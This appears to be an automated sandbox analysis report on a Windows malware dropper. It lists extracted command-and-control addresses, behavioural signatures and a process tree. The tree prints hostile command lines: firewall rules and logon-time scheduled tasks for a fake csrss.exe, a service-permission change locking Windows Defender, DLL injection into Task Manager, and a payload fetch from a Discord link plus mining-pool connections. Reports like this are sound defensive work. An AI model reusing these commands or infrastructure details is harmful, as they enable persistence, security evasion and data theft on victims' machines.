Resubmissions

12-03-2024 13:07

240312-qcwt3ahe5t 10

12-03-2024 07:52

240312-jqvetsdh93 10

Analysis

  • max time kernel
    862s
  • max time network
    862s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12-03-2024 13:07

General

  • Target

    file.exe

  • Size

    39KB

  • MD5

    699e79d0f4a7586ffe53d0dabc5c0a5a

  • SHA1

    7178ab85fe6190259b64846c76af01b8da5b0cd4

  • SHA256

    b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca

  • SHA512

    56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526

  • SSDEEP

    768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.145

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

socks5systemz

C2

http://bghmfep.com/search/?q=67e28dd86d58f02d130da81f7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978a571ea771795af8e05c644db22f31dfe339426fa11a366c350adb719a9577e55b8603e983a608fff13c4e79c993d

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 7 IoCs
  • Contacts a large (4190) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 15 IoCs
  • Executes dropped EXE 49 IoCs
  • Loads dropped DLL 29 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 8 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 5 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:17632
      • C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe
        "C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:22060
        • C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp" /SL5="$502CA,1807550,56832,C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:21880
          • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
            "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
            5⤵
            • Executes dropped EXE
            PID:4320
          • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
            "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
            5⤵
            • Executes dropped EXE
            PID:2184
      • C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
        "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:10796
        • C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe
          "C:\Users\Admin\Pictures\oHE5OfAE7uZo5wM5zxGSo2Yh.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:19500
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:19904
          • C:\Windows\System32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:2496
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:4416
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6152
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:17488
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Manipulates WinMonFS driver.
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              PID:20712
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                6⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious use of AdjustPrivilegeToken
                PID:21576
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                6⤵
                • Creates scheduled task(s)
                PID:5448
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /delete /tn ScheduledUpdate /f
                6⤵
                  PID:12268
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:12156
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:10676
                • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                  C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  6⤵
                  • Executes dropped EXE
                  PID:22252
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:21464
                • C:\Windows\windefender.exe
                  "C:\Windows\windefender.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:21240
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    7⤵
                      PID:9936
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        8⤵
                        • Launches sc.exe
                        • Suspicious use of AdjustPrivilegeToken
                        PID:9824
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4676
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    6⤵
                    • Executes dropped EXE
                    PID:6200
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6284
                  • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                    6⤵
                    • Executes dropped EXE
                    PID:8040
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:8112
                  • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1888
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:14436
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5148
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:13948
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:9424
            • C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe
              "C:\Users\Admin\Pictures\ItyNfie1VMw2nLT7eTugtvYL.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3868
              • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:5968
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                  5⤵
                    PID:4320
                    • C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                      "C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe"
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of AdjustPrivilegeToken
                      PID:20248
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\HIIEBAFCBK.exe
                        7⤵
                          PID:20056
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 2.2.2.2 -n 1 -w 3000
                            8⤵
                            • Runs ping.exe
                            PID:1852
                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:9488
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:11988
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 1251
                        6⤵
                          PID:2248
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                          6⤵
                          • Creates scheduled task(s)
                          PID:5448
                  • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                    "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --silent --allusers=0
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates connected drives
                    • Modifies system certificate store
                    • Suspicious use of WriteProcessMemory
                    PID:12036
                    • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                      C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6db421c8,0x6db421d4,0x6db421e0
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13676
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CkelNmqDwew6WPNzMTNOQeqx.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:14428
                    • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                      "C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=12036 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240312130803" --session-guid=52c5fd4c-d793-4139-a592-fdb3e1102c9d --server-tracking-blob=NGY3YmU5NTI4YWVmYjM2MTM2M2RjN2VjZTVmNTYwOWYwOTA3Mzg4ZDZhNmZmNWNjYTFhNWRmNmE0NGE4NTVhMzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDI0ODg3NS4yMzI5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZDY2NzEyZS00ZmNjLTQ0ODYtOWFmZi1jZjYxYzc4OGQ5MGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5004000000000000
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Enumerates connected drives
                      • Suspicious use of WriteProcessMemory
                      PID:14960
                      • C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe
                        C:\Users\Admin\Pictures\CkelNmqDwew6WPNzMTNOQeqx.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2cc,0x6d0321c8,0x6d0321d4,0x6d0321e0
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:15204
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:6864
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:11556
                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121308031\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x200040,0x20004c,0x200058
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:15312
                  • C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
                    "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:10020
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:9812
                    • C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe
                      "C:\Users\Admin\Pictures\uU0jFy7gS9hEAPMIe43bhoBX.exe"
                      4⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      PID:20496
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:7828
                  • C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe
                    "C:\Users\Admin\Pictures\3hR8i08CkrUYFyeQRQrcPsfW.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:11644
                    • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      4⤵
                      • Executes dropped EXE
                      PID:11796
                  • C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe
                    "C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:13620
                    • C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-4J9HN.tmp\sO7J9X3BBbRMGvIrK0o2MAfH.tmp" /SL5="$404DC,1807550,56832,C:\Users\Admin\Pictures\sO7J9X3BBbRMGvIrK0o2MAfH.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13736
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        5⤵
                        • Executes dropped EXE
                        PID:13360
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        5⤵
                        • Executes dropped EXE
                        PID:13392
                  • C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
                    "C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe" --silent --allusers=0
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates connected drives
                    PID:13668
                    • C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe
                      C:\Users\Admin\Pictures\o80VeACipQO1BsWWJMh5Q0G4.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69bc21c8,0x69bc21d4,0x69bc21e0
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13716
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\o80VeACipQO1BsWWJMh5Q0G4.exe" --version
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:13848
                  • C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
                    "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4160
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2372
                    • C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe
                      "C:\Users\Admin\Pictures\0O4uZyUrqIFSEpTeH1H0rg8K.exe"
                      4⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • Modifies data under HKEY_USERS
                      PID:6012
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5240
                  • C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe
                    "C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:4700
                    • C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-QR3BA.tmp\bhJRGCgBFLmbnysHYxZIy2UZ.tmp" /SL5="$704E8,1807550,56832,C:\Users\Admin\Pictures\bhJRGCgBFLmbnysHYxZIy2UZ.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2780
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        5⤵
                        • Executes dropped EXE
                        PID:12044
                      • C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                        "C:\Users\Admin\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        5⤵
                        • Executes dropped EXE
                        PID:12612
                  • C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe
                    "C:\Users\Admin\Pictures\kL5MaQu7jAAGIFgNQb6ujSPo.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:5892
                    • C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
                      4⤵
                      • Executes dropped EXE
                      PID:1284
                    • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:11600
